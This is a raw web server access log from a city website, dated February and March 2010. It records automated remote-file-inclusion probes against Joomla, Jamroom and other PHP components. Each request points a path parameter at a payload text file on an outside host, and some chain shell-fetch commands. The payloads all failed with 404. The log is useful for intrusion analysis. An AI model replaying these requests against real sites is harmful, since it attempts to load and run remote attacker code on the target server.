219.94.194.248 - - [28/Feb/2010:22:42:26 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.232.45.121 - - [28/Feb/2010:22:42:30 -0800] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.232.45.121 - - [28/Feb/2010:22:42:30 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.232.45.121 - - [28/Feb/2010:22:42:30 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.232.45.121 - - [28/Feb/2010:22:42:37 -0800] "GET /logs/access_091001.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.232.45.121 - - [28/Feb/2010:22:44:27 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.232.45.121 - - [28/Feb/2010:22:44:28 -0800] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.232.45.121 - - [28/Feb/2010:22:44:28 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.232.45.121 - - [28/Feb/2010:22:44:33 -0800] "GET /logs/access_091001.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.12 - - [28/Feb/2010:22:49:01 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.12 - - [28/Feb/2010:22:49:01 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.12 - - [28/Feb/2010:22:49:02 -0800] "GET /logs/access_090601.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:22:49:10 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:22:49:10 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:22:49:10 -0800] "GET /logs/access_090330.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:22:49:29 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:22:49:29 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:22:49:29 -0800] "GET /logs/access_090330.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.12 - - [28/Feb/2010:22:49:40 -0800] "GET /logs/access_090701.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.190.166.35 - - [28/Feb/2010:22:59:53 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
195.190.166.35 - - [28/Feb/2010:22:59:53 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:00:08 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:00:08 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:00:08 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:00:38 -0800] "GET /logs/access_091201.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:01:33 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:01:33 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:01:33 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:02:01 -0800] "GET /logs/access_091201.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
186.28.232.13 - - [28/Feb/2010:23:03:29 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
186.28.232.13 - - [28/Feb/2010:23:03:30 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
186.28.232.13 - - [28/Feb/2010:23:06:29 -0800] "GET /logs/access_090601.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
186.28.232.13 - - [28/Feb/2010:23:07:48 -0800] "GET /logs/access_090501.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.190.166.35 - - [28/Feb/2010:23:08:46 -0800] "GET /logs/access_090601.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
195.190.166.35 - - [28/Feb/2010:23:08:48 -0800] "GET /logs/access_090501.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:29:48 -0800] "GET /logs/access_090330.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:31:34 -0800] "GET /logs/access_090330.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:33:43 -0800] "GET /logs/access_100101.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.223 - - [28/Feb/2010:23:34:04 -0800] "GET /logs/access_090601.log//_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [28/Feb/2010:23:34:05 -0800] "GET /_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [28/Feb/2010:23:34:05 -0800] "GET /logs//_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.0" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [28/Feb/2010:23:34:52 -0800] "GET /logs/access_091231.log//_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:35:30 -0800] "GET /logs/access_100101.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.132 - - [28/Feb/2010:23:35:42 -0800] "GET /logs/access_090601.log//_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [28/Feb/2010:23:35:42 -0800] "GET /_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [28/Feb/2010:23:35:43 -0800] "GET /logs//_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [28/Feb/2010:23:36:56 -0800] "GET /logs/access_091231.log//_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
61.111.3.35 - - [28/Feb/2010:23:39:39 -0800] "GET /logs//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.111.3.35 - - [28/Feb/2010:23:39:39 -0800] "GET /purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.111.3.35 - - [28/Feb/2010:23:39:39 -0800] "GET /logs/access_090401.log//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [28/Feb/2010:23:43:42 -0800] "GET /purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [28/Feb/2010:23:43:42 -0800] "GET /logs//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [28/Feb/2010:23:43:42 -0800] "GET /logs/access_090401.log//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.247.64.150 - - [28/Feb/2010:23:45:58 -0800] "GET /purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.247.64.150 - - [28/Feb/2010:23:45:58 -0800] "GET /logs//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.247.64.150 - - [28/Feb/2010:23:45:58 -0800] "GET /logs/access_090401.log//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.223 - - [28/Feb/2010:23:46:27 -0800] "GET /logs//_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [28/Feb/2010:23:46:27 -0800] "GET /_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
72.55.148.208 - - [28/Feb/2010:23:48:23 -0800] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [28/Feb/2010:23:48:23 -0800] "GET /logs/access_100101.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [28/Feb/2010:23:48:23 -0800] "GET /logs//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [28/Feb/2010:23:48:42 -0800] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [28/Feb/2010:23:48:42 -0800] "GET /logs/access_100101.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [28/Feb/2010:23:48:42 -0800] "GET /logs//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [28/Feb/2010:23:48:44 -0800] "GET /logs/access_090301.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [28/Feb/2010:23:48:46 -0800] "GET /logs/access_090301.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:51:32 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:51:32 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:51:32 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.132 - - [28/Feb/2010:23:52:39 -0800] "GET /logs//_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [28/Feb/2010:23:52:39 -0800] "GET /_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:54:33 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:54:33 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [28/Feb/2010:23:54:33 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.145 - - [28/Feb/2010:23:56:55 -0800] "GET /logs/access_090401.log//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.145 - - [28/Feb/2010:23:56:55 -0800] "GET /logs//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.145 - - [28/Feb/2010:23:56:55 -0800] "GET /purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:02:34 -0800] "GET /logs/access_100101.log//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:02:34 -0800] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:02:34 -0800] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:02:37 -0800] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:02:37 -0800] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:02:37 -0800] "GET /logs/access_100101.log//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:02:39 -0800] "GET /logs/access_090301.log//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:02:46 -0800] "GET /logs/access_090301.log//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.239.124.204 - - [01/Mar/2010:00:03:53 -0800] "GET /index.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.239.124.204 - - [01/Mar/2010:00:03:53 -0800] "GET /logs/access_091231.log//index.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.239.124.204 - - [01/Mar/2010:00:03:53 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.239.124.204 - - [01/Mar/2010:00:05:44 -0800] "GET /logs/access_091231.log//index.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.239.124.204 - - [01/Mar/2010:00:05:45 -0800] "GET /index.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.239.124.204 - - [01/Mar/2010:00:05:45 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:09:36 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:09:36 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:09:36 -0800] "GET /logs/access_100101.log//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:09:40 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:09:40 -0800] "GET /logs/access_100101.log//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:09:40 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:09:42 -0800] "GET /logs/access_090301.log//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:09:45 -0800] "GET /logs/access_090301.log//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.239.124.204 - - [01/Mar/2010:00:10:47 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.239.124.204 - - [01/Mar/2010:00:10:47 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.239.124.204 - - [01/Mar/2010:00:10:47 -0800] "GET /logs/access_091031.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:11:14 -0800] "GET /logs/access_100101.log//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:11:14 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:11:14 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:11:23 -0800] "GET /logs/access_090301.log//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:13:27 -0800] "GET /logs/access_100101.log//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
